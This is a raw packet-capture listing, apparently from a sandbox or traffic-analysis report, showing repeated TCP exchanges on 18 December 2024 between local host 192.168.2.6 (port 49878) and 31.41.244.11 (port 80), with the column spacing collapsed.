                                                                                                                                                              Dec 18, 2024 11:47:48.335871935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.335905075 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.336900949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.336922884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.336986065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.337074995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.338119984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.338164091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.338284016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.338319063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.339363098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.339375973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.339413881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.340538025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.340612888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.340663910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.340696096 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.341700077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.341711998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.341742992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.341758013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.342835903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.342850924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.342881918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.342906952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.343997955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.344008923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.344044924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.345339060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.345351934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.345386028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.345412970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.346272945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.346314907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.476552963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.476613045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.476660967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.476686954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.477148056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.477161884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.477188110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.477207899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.478310108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.478360891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.478777885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.478790998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.478813887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.478831053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.479938030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.479949951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.479991913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.481136084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.481168985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.481177092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.481214046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.482208014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.482254028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.482276917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.482312918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.483413935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.483427048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.483460903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.483478069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.484638929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.484663010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.484761000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.485929012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.485940933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.485975981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.485986948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.487093925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.487137079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.487251043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.487432957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.488498926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.488512993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.488538980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.488564968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.489453077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.489490032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.489701033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.489741087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.490587950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.490628958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.490632057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.490663052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.491960049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.491971970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.492000103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.492018938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.493120909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.493134022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.493159056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.493182898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.494462013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.494473934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.494508982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.494519949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.495726109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.495740891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.495770931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.495784044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.497133970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.497148991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.497173071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.497186899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.497972965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.498008013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.498070002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.498111010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.498953104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.498965025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.498990059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.499012947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.499928951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.499957085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.499967098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.499993086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.500974894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.501014948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.501019955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.501051903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.502109051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.502127886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.502147913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.502161980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.503372908 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.503385067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.503421068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.503433943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.504456043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.504496098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.504544020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.504582882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.505659103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.505671024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.505702972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.505714893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.506791115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.506830931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.506989956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.507025957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.508002996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.508066893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.508097887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.508140087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.509394884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.509433985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.509454966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.509490013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.510662079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.510674000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.510710955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.511665106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.511713982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.511749983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.511789083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.512717009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.512761116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.512820959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.512857914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.513973951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.513987064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.514018059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.514029026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.514942884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.514978886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.515125036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.515161991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.516161919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.516174078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.516202927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.516218901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.517318010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.517360926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.517378092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.517409086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.518496037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.518537045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.518567085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.518610001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.519762993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.519783974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.519798994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.519813061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.520832062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.520843983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.520865917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.520885944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.522007942 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.522046089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.522121906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.522155046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.523195028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.523206949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.523238897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.524372101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.524384975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.524409056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.524437904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.525504112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.525517941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.525546074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.525559902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.526650906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.526695013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.526710033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.526747942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.527837038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.527849913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.527879953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.527890921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.529067039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.529103994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.529148102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.529184103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.530361891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.530374050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.530399084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.530416965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.531369925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.531410933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.531445980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.531476974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.532531977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.532543898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.532604933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.533672094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.533687115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.533724070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.533762932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.534996033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.535007954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.535124063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.535124063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.536125898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.536138058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.536168098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.537990093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.538006067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.538028955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.538043976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.668143034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.668158054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.668231964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.668638945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.668651104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.668680906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.668703079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.669920921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.669958115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.670238018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.670275927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.670928955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.670942068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.671005964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.671005964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.672091007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.672105074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.672136068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.672147989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.673202038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.673245907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.673434973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.673469067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.674340963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.674354076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.674376965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.674390078 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.675457001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.675472021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.675496101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.675522089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.676615000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.676626921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.676655054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.676666021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.678040028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.678054094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.678077936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.678091049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.678992987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.679007053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.679033041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.679054022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.680165052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.680179119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.680205107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.680231094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.681313038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.681350946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.681390047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.681426048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.682409048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.682423115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.682447910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.682466984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.683562040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.683576107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.683608055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.683624983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.685060024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.685072899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.685103893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.685113907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.685894012 CET804987831.41.244.11192.168.2.6
